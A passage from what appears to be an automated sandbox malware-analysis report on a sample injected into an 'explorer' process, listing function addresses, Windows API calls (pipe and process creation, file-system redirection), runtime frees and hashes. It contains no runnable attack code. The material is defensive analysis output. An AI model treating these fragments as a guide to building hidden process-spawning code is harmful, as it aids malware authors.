                                                                                                        • Instruction Fuzzy Hash: AFD17C71D00205EFDF21DFA8D885BEABBB5BF09300F144169E595B7282DB79A846CB60
                                                                                                        Function 00768280 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 257pipeprocessfileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetTempPathA.KERNEL32(00000080,?), ref: 0076832D
                                                                                                        • CreatePipe.KERNEL32(00000000,00000000,0000000C,00000000), ref: 00768403
                                                                                                        • SetHandleInformation.KERNEL32(00000000,00000001,00000000), ref: 00768415
                                                                                                        • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 00768459
                                                                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00000044,?), ref: 00768481
                                                                                                        • Wow64RevertWow64FsRedirection.KERNEL32(00000000), ref: 0076848F
                                                                                                        • WaitForSingleObject.KERNEL32(?,00000064), ref: 007684B8
                                                                                                        • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 007684DA
                                                                                                        • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 007684FE
                                                                                                        • ReadFile.KERNEL32(00000000,?,0000007F,00000000,00000000), ref: 00768525
                                                                                                        • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0076856A
                                                                                                        • CloseHandle.KERNEL32(?), ref: 00768581
                                                                                                        • CloseHandle.KERNEL32(?), ref: 00768589
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00768591
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00768599
                                                                                                        • GetLastError.KERNEL32 ref: 007685A3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Handle$ClosePipeWow64$NamedPeek$CreateRedirection$DisableErrorFileInformationLastObjectPathProcessReadRevertSingleTempWait
                                                                                                        • String ID: D
                                                                                                        • API String ID: 3215130363-2746444292
                                                                                                        • Opcode ID: cf9395ec9d3c28d7a2a2045da656955b914da00bfe581b8e19f8a0380eebfbdd
                                                                                                        • Instruction ID: dc91b341a1afb53071715daaa6d4a2eedf6e5d1adc3572104c9c187daacf2607
                                                                                                        • Opcode Fuzzy Hash: cf9395ec9d3c28d7a2a2045da656955b914da00bfe581b8e19f8a0380eebfbdd
                                                                                                        • Instruction Fuzzy Hash: 51A19171940218ABEF60DF64CC49FDDBB78AF04700F1042D5EA09B6191DB79AE84CF95
                                                                                                        Function 0079FB31 Relevance: 25.9, APIs: 17, Instructions: 411COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$___from_strstr_to_strchr
                                                                                                        • String ID:
                                                                                                        • API String ID: 3409252457-0
                                                                                                        • Opcode ID: 2844f9588aaf9ace0a66b236c9d6b404834de7c8389b64f62ca9d43b1c57f9fb
                                                                                                        • Instruction ID: 15ddc22b87fd94f6eb9946096bb27c08003eeecb7f6bb962a5f92b0e8e542e86
                                                                                                        • Opcode Fuzzy Hash: 2844f9588aaf9ace0a66b236c9d6b404834de7c8389b64f62ca9d43b1c57f9fb
                                                                                                        • Instruction Fuzzy Hash: 34D1D3B1A04305EFDF25AFB4A895A6E77B4AF06310F14817DF911E7292EB3D8900C7A1
                                                                                                        Function 007A05A7 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 373COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free
                                                                                                        • String ID: @R|$@R|
                                                                                                        • API String ID: 269201875-720877917
                                                                                                        • Opcode ID: 4b13aa1cf16fd5a58057640777705f4e7ec6199363f98cc42f1c6f2a94957477
                                                                                                        • Instruction ID: 4d835c5ff72c28c577048bf8a70652ee6c71f412898df85a4ad60832a2f262fa
                                                                                                        • Opcode Fuzzy Hash: 4b13aa1cf16fd5a58057640777705f4e7ec6199363f98cc42f1c6f2a94957477
                                                                                                        • Instruction Fuzzy Hash: 1BC145B2D40204EFDF20DBA8DD46FEE77F8AB49700F144565FA05FB282D6749A409BA0
                                                                                                        Function 007A11AF Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 113COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _free.LIBCMT ref: 007A11E8
                                                                                                          • Part of subcall function 00797C06: HeapFree.KERNEL32(00000000,00000000,?,007A0BFE,?,00000000,?,8B18EC83,?,007A0EA1,?,00000007,?,?,007A1346,?), ref: 00797C1C
                                                                                                          • Part of subcall function 00797C06: GetLastError.KERNEL32(?,?,007A0BFE,?,00000000,?,8B18EC83,?,007A0EA1,?,00000007,?,?,007A1346,?,?), ref: 00797C2E
                                                                                                          • Part of subcall function 007A04A9: _free.LIBCMT ref: 007A04C6
                                                                                                          • Part of subcall function 007A04A9: _free.LIBCMT ref: 007A04D8
                                                                                                          • Part of subcall function 007A04A9: _free.LIBCMT ref: 007A04EA
                                                                                                          • Part of subcall function 007A04A9: _free.LIBCMT ref: 007A04FC
                                                                                                          • Part of subcall function 007A04A9: _free.LIBCMT ref: 007A050E
                                                                                                          • Part of subcall function 007A04A9: _free.LIBCMT ref: 007A0520
                                                                                                          • Part of subcall function 007A04A9: _free.LIBCMT ref: 007A0532
                                                                                                          • Part of subcall function 007A04A9: _free.LIBCMT ref: 007A0544
                                                                                                          • Part of subcall function 007A04A9: _free.LIBCMT ref: 007A0556
                                                                                                          • Part of subcall function 007A04A9: _free.LIBCMT ref: 007A0568
                                                                                                          • Part of subcall function 007A04A9: _free.LIBCMT ref: 007A057A
                                                                                                          • Part of subcall function 007A04A9: _free.LIBCMT ref: 007A058C
                                                                                                          • Part of subcall function 007A04A9: _free.LIBCMT ref: 007A059E
                                                                                                        • _free.LIBCMT ref: 007A120A
                                                                                                        • _free.LIBCMT ref: 007A121F
                                                                                                        • _free.LIBCMT ref: 007A122A
                                                                                                        • _free.LIBCMT ref: 007A124C
                                                                                                        • _free.LIBCMT ref: 007A125F
                                                                                                        • _free.LIBCMT ref: 007A126D
                                                                                                        • _free.LIBCMT ref: 007A1278
                                                                                                        • _free.LIBCMT ref: 007A12B0
                                                                                                        • _free.LIBCMT ref: 007A12B7
                                                                                                        • _free.LIBCMT ref: 007A12D4
                                                                                                        • _free.LIBCMT ref: 007A12EC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                        • String ID: @R|
                                                                                                        • API String ID: 776569668-1592088083
                                                                                                        • Opcode ID: cae3762d5b917524082f8b16828fc63323814f5b96e1f87dbb407f3574af343c
                                                                                                        • Instruction ID: aa76b094f50bbe4c4781264271b5907eae66d00c3398b96521d59115380adc24
                                                                                                        • Opcode Fuzzy Hash: cae3762d5b917524082f8b16828fc63323814f5b96e1f87dbb407f3574af343c
                                                                                                        • Instruction Fuzzy Hash: E5315A72604201DFEF35AE79E909F5A73E8BF82351F544A29F449E6191DA38EC80CB60
                                                                                                        Function 007A04A9 Relevance: 19.6, APIs: 13, Instructions: 88COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _free.LIBCMT ref: 007A04C6
                                                                                                          • Part of subcall function 00797C06: HeapFree.KERNEL32(00000000,00000000,?,007A0BFE,?,00000000,?,8B18EC83,?,007A0EA1,?,00000007,?,?,007A1346,?), ref: 00797C1C
                                                                                                          • Part of subcall function 00797C06: GetLastError.KERNEL32(?,?,007A0BFE,?,00000000,?,8B18EC83,?,007A0EA1,?,00000007,?,?,007A1346,?,?), ref: 00797C2E
                                                                                                        • _free.LIBCMT ref: 007A04D8
                                                                                                        • _free.LIBCMT ref: 007A04EA
                                                                                                        • _free.LIBCMT ref: 007A04FC
                                                                                                        • _free.LIBCMT ref: 007A050E
                                                                                                        • _free.LIBCMT ref: 007A0520
                                                                                                        • _free.LIBCMT ref: 007A0532
                                                                                                        • _free.LIBCMT ref: 007A0544
                                                                                                        • _free.LIBCMT ref: 007A0556
                                                                                                        • _free.LIBCMT ref: 007A0568
                                                                                                        • _free.LIBCMT ref: 007A057A
                                                                                                        • _free.LIBCMT ref: 007A058C
                                                                                                        • _free.LIBCMT ref: 007A059E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 776569668-0
                                                                                                        • Opcode ID: 5352c5dc4a539f0b6b855e01d56ae6b2a95a4ef1b63a491925518ace6e31a6d0
                                                                                                        • Instruction ID: a78ad9e072e486bb9191c5821c38df61e442ddebad6cedaf1ec6c58b3a2a3e01
                                                                                                        • Opcode Fuzzy Hash: 5352c5dc4a539f0b6b855e01d56ae6b2a95a4ef1b63a491925518ace6e31a6d0
                                                                                                        • Instruction Fuzzy Hash: 3021C0B2518A00EBCA39EF68F589C1A73F9BB463117644D09F045E7651CB3DFCD08AA4
                                                                                                        Function 0078CA12 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 304COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • IsInExceptionSpec.LIBVCRUNTIME ref: 0078CB0F
                                                                                                        • type_info::operator==.LIBVCRUNTIME ref: 0078CB31
                                                                                                        • ___TypeMatch.LIBVCRUNTIME ref: 0078CC40
                                                                                                        • CatchIt.LIBVCRUNTIME ref: 0078CC91
                                                                                                        • IsInExceptionSpec.LIBVCRUNTIME ref: 0078CD12
                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 0078CD96
                                                                                                        • CallUnexpected.LIBVCRUNTIME ref: 0078CDB1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                        • String ID: csm$csm$csm
                                                                                                        • API String ID: 4234981820-393685449
                                                                                                        • Opcode ID: b135c5ec20a25f248f16c5be88bdb01c10ee3d0eab062547b530fdcc4377925a
                                                                                                        • Instruction ID: a77035d774ffcc32e38053b4fdda0c67d2f8a2629a12a08905f5d034d9308c12
                                                                                                        • Opcode Fuzzy Hash: b135c5ec20a25f248f16c5be88bdb01c10ee3d0eab062547b530fdcc4377925a
                                                                                                        • Instruction Fuzzy Hash: F3B18F71940209EFCF1AFFA4C9859AEBBB5FF04310F1440AAE9156B212E339D911CBB1
                                                                                                        Function 0079AFB7 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID: 0-3907804496
                                                                                                        • Opcode ID: a4e12a968032e59e890fa0ea62136e15dffa71bb2a50cdd48398f5be2db731a6
                                                                                                        • Instruction ID: bd7d3c058ab15b365dc8ed794c15acd769023132912d23387685af54a5c4a75f
                                                                                                        • Opcode Fuzzy Hash: a4e12a968032e59e890fa0ea62136e15dffa71bb2a50cdd48398f5be2db731a6
                                                                                                        • Instruction Fuzzy Hash: 29C1E174A04209EFDF15DFA8F985BAEBBB1FF4A300F144159E414AB392C7389941CB65
                                                                                                        Function 007A09C6 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 199COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free
                                                                                                        • String ID: @R|
                                                                                                        • API String ID: 269201875-1592088083
                                                                                                        • Opcode ID: 5b448c6b9a1c06bd41fbb279480fac366e53ca73fa8612b5e304255013712a6f
                                                                                                        • Instruction ID: 816335c4637bb828d5f9f9795bc615821e740084d03ca911462175bddd90b137
                                                                                                        • Opcode Fuzzy Hash: 5b448c6b9a1c06bd41fbb279480fac366e53ca73fa8612b5e304255013712a6f
                                                                                                        • Instruction Fuzzy Hash: 9661C3B1900205DFDF20DF74DD41BAAB7F9AB86710F104A69E945AB281EB74AD40CBA0
                                                                                                        Function 00796708 Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _free.LIBCMT ref: 0079671E
                                                                                                          • Part of subcall function 00797C06: HeapFree.KERNEL32(00000000,00000000,?,007A0BFE,?,00000000,?,8B18EC83,?,007A0EA1,?,00000007,?,?,007A1346,?), ref: 00797C1C
                                                                                                          • Part of subcall function 00797C06: GetLastError.KERNEL32(?,?,007A0BFE,?,00000000,?,8B18EC83,?,007A0EA1,?,00000007,?,?,007A1346,?,?), ref: 00797C2E
                                                                                                        • _free.LIBCMT ref: 0079672A
                                                                                                        • _free.LIBCMT ref: 00796735
                                                                                                        • _free.LIBCMT ref: 00796740
                                                                                                        • _free.LIBCMT ref: 0079674B
                                                                                                        • _free.LIBCMT ref: 00796756
                                                                                                        • _free.LIBCMT ref: 00796761
                                                                                                        • _free.LIBCMT ref: 0079676C
                                                                                                        • _free.LIBCMT ref: 00796777
                                                                                                        • _free.LIBCMT ref: 00796785
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 776569668-0
                                                                                                        • Opcode ID: 140245f09f769ecd5e53180c92b7647c2267d5b7d93c2c0fb72db2b8c1ff7038
                                                                                                        • Instruction ID: 417eae8e14cde4109a4f212d0f42e2ca73a4d9a6a413d435af9e787300ccf9e2
                                                                                                        • Opcode Fuzzy Hash: 140245f09f769ecd5e53180c92b7647c2267d5b7d93c2c0fb72db2b8c1ff7038
                                                                                                        • Instruction Fuzzy Hash: BB21D4B6914108EFCF06EFA4D985DDE7BB8EF08340F0141A6F505AB121EB35EA54CB90
                                                                                                        Function 007A3541 Relevance: 13.8, APIs: 9, Instructions: 273COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 007A31FA: CreateFileW.KERNEL32(00000000,00000000,?,007A35EA,?,?,00000000,?,007A35EA,00000000,0000000C), ref: 007A3217
                                                                                                        • GetLastError.KERNEL32 ref: 007A3655
                                                                                                        • __dosmaperr.LIBCMT ref: 007A365C
                                                                                                        • GetFileType.KERNEL32(00000000), ref: 007A3668
                                                                                                        • GetLastError.KERNEL32 ref: 007A3672
                                                                                                        • __dosmaperr.LIBCMT ref: 007A367B
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 007A369B
                                                                                                        • CloseHandle.KERNEL32(?), ref: 007A37E8
                                                                                                        • GetLastError.KERNEL32 ref: 007A381A
                                                                                                        • __dosmaperr.LIBCMT ref: 007A3821
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                        • String ID:
                                                                                                        • API String ID: 4237864984-0
                                                                                                        • Opcode ID: 3171ae2f356693a4cfae4bdc860b29b118e60d23e00b1760ea96fc4efd294b33
                                                                                                        • Instruction ID: d98cfb32c09e46215e45d2f101c84d4a17c6ccaccb8678d9a9286406c2bcc211
                                                                                                        • Opcode Fuzzy Hash: 3171ae2f356693a4cfae4bdc860b29b118e60d23e00b1760ea96fc4efd294b33
                                                                                                        • Instruction Fuzzy Hash: E8A11832A141549FCF199F68DC95BAE7BA1AB47320F14425DF801AF3A2DB3C9A12CB51
                                                                                                        Function 00788A73 Relevance: 13.6, APIs: 9, Instructions: 139threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CurrentThread$_xtime_get$Xtime_diff_to_millis2
                                                                                                        • String ID:
                                                                                                        • API String ID: 3943753294-0
                                                                                                        • Opcode ID: 2a6f6f95c2fa06d52bf69feff58edb323df9f0cd45d560d71854724e13605928
                                                                                                        • Instruction ID: 593808ae93418d0f6dfa050b6c7b340ed61545775fee0f275eca489858e97491
                                                                                                        • Opcode Fuzzy Hash: 2a6f6f95c2fa06d52bf69feff58edb323df9f0cd45d560d71854724e13605928
                                                                                                        • Instruction Fuzzy Hash: 1B51A2B1A40209CFCF54EF18C9C596E7BF5FF48310B54855AE806AB295DB38ED40CBA6
                                                                                                        Function 00782460 Relevance: 12.3, APIs: 8, Instructions: 343COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Mtx_unlock$Rethrow_future_exceptionstd::_$Cnd_broadcast
                                                                                                        • String ID:
                                                                                                        • API String ID: 3990724213-0
                                                                                                        • Opcode ID: 4e509fa6988ca03280f22059a9f1b04062122a5e04bc814ec050981ee1f920a2
                                                                                                        • Instruction ID: 74485816d34a2ad11cefb348421912e5ab253e4dffa7dcf8772d76255275366a
                                                                                                        • Opcode Fuzzy Hash: 4e509fa6988ca03280f22059a9f1b04062122a5e04bc814ec050981ee1f920a2
                                                                                                        • Instruction Fuzzy Hash: 34B126B1D40609DFDB10EF64C849BAEBBF4FF05311F00456DE91697682EB39A905CBA2
                                                                                                        Function 00794F37 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 186COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00797E35: HeapAlloc.KERNEL32(00000000,007808E7,?,?,00789ABF,007808E7,?,007830BE,8B18EC84,74DF0F00), ref: 00797E67
                                                                                                        • _free.LIBCMT ref: 00795046
                                                                                                        • _free.LIBCMT ref: 0079505D
                                                                                                        • _free.LIBCMT ref: 0079507A
                                                                                                        • _free.LIBCMT ref: 00795095
                                                                                                        • _free.LIBCMT ref: 007950AC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$AllocHeap
                                                                                                        • String ID: |={
                                                                                                        • API String ID: 1835388192-261466156
                                                                                                        • Opcode ID: d2b17cead7992f67fff150e5145dcf2f79b0ae9d2d0d44a9fbf43d218bd530c3
                                                                                                        • Instruction ID: 7ecff086502a0fc564af14bae50f71736be5d217956050cbf7fe031d6a0760f0
                                                                                                        • Opcode Fuzzy Hash: d2b17cead7992f67fff150e5145dcf2f79b0ae9d2d0d44a9fbf43d218bd530c3
                                                                                                        • Instruction Fuzzy Hash: 4251AF72A00B05EFDF26DF69EC41B6A77F5EF48720B140569E805D7250E739EA41CB80
                                                                                                        Function 007720F0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 169COMMON
